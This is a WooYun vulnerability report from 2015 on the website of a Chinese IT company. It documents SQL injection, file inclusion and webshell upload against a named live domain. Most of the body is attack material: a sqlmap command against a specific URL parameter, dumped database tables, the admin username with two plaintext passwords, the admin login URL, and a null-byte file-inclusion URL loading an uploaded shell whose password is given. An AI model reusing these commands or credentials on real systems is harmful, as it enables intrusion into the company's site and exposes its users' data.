迪讯信息技术公司SQL注入/文件包含/getshell

编号150851
Urlhttp://www.wooyun.org/bug.php?action=view&id=150851
漏洞状态未联系到厂商或者厂商积极忽略
漏洞标题迪讯信息技术公司SQL注入/文件包含/getshell
漏洞类型SQL注射漏洞
厂商迪讯信息技术公司
白帽子冷白开。
提交日期2015-11-02 14:06:00
公开日期2015-12-17 14:08:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签管理后台对外 后台被猜解 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank0
漏洞简介
迪讯信息技术公司SQL注入/文件包含/getshell
漏洞细节

sqlmap.py -u "http://www.dcominfo.com/product/index.php?type_id=9" --dbs

1.png

available databases [2]:
[*] dcominfo
[*] information_schema
Database: dcominfo
[10 tables]
+---------------------------+
| ruideman_cn_archives |
| ruideman_cn_news |
| ruideman_cn_news_type |
| ruideman_cn_partners |
| ruideman_cn_partners_type |
| ruideman_cn_pictures |
| ruideman_cn_product |
| ruideman_cn_product_type |
| ruideman_cn_user |
| ruideman_cn_xuhao |
+---------------------------+
Database: dcominfo
Table: ruideman_cn_user
[37 columns]
+-------------------+------------------+
| Column | Type |
+-------------------+------------------+
| answer | varchar(40) |
| area | varchar(6) |
| birthday | date |
| city | varchar(6) |
| clicktimes | int(10) unsigned |
| company_type | tinyint(3) |
| education_type | tinyint(3) |
| email | varchar(40) |
| good_evaluate | float |
| integrity_grade | tinyint(3) |
| is_check | tinyint(1) |
| lastlog | datetime |
| marriage_type | tinyint(3) |
| nick_name | varchar(50) |
| pass | tinyint(4) |
| password | varchar(32) |
| province | varchar(6) |
| question | varchar(40) |
| real_name | varchar(30) |
| recommend_user_id | int(10) |
| recommendflag | tinyint(1) |
| session_id | char(32) |
| sex | tinyint(3) |
| structon_tb | text |
| submit_date | datetime |
| thumbnail | varchar(100) |
| topflag | tinyint(1) |
| total_credit | int(10) |
| user_grade | tinyint(1) |
| user_group | smallint(1) |
| user_id | int(10) unsigned |
| user_ip | varchar(23) |
| user_money | float |
| user_name | varchar(30) |
| user_popedom | varchar(200) |
| user_type | tinyint(1) |
| vocation_type | tinyint(3) |
+-------------------+------------------+
Database: dcominfo
Table: ruideman_cn_user
[1 entry]
+-----------+
| user_name |
+-----------+
| admin |
+-----------+
Database: dcominfo
Table: ruideman_cn_user
[1 entry]
+----------+
| password |
+----------+
| ab0528 |
+----------+


后台

http://www.dcominfo.com/admin/login.php


刚那管理员又去改密码了。。。乌云。。。可是密码还是明文的。。。
新密码:DcomXGA0528

4.png


撸进后台
然后进行上传shell
http://www.dcominfo.com/wap/detail.php?mod=/uploadfile/product/s/1/46_1446271963.jpg%00
密码1

2.png


已经getshell

POC

综上

修复方案

已经和管理员沟通过,他们会来认领的,求过,管理员QQ:2250832217

3.png

状态信息 2015-11-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-17: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复(not set)
回应信息未能联系到厂商或者厂商积极拒绝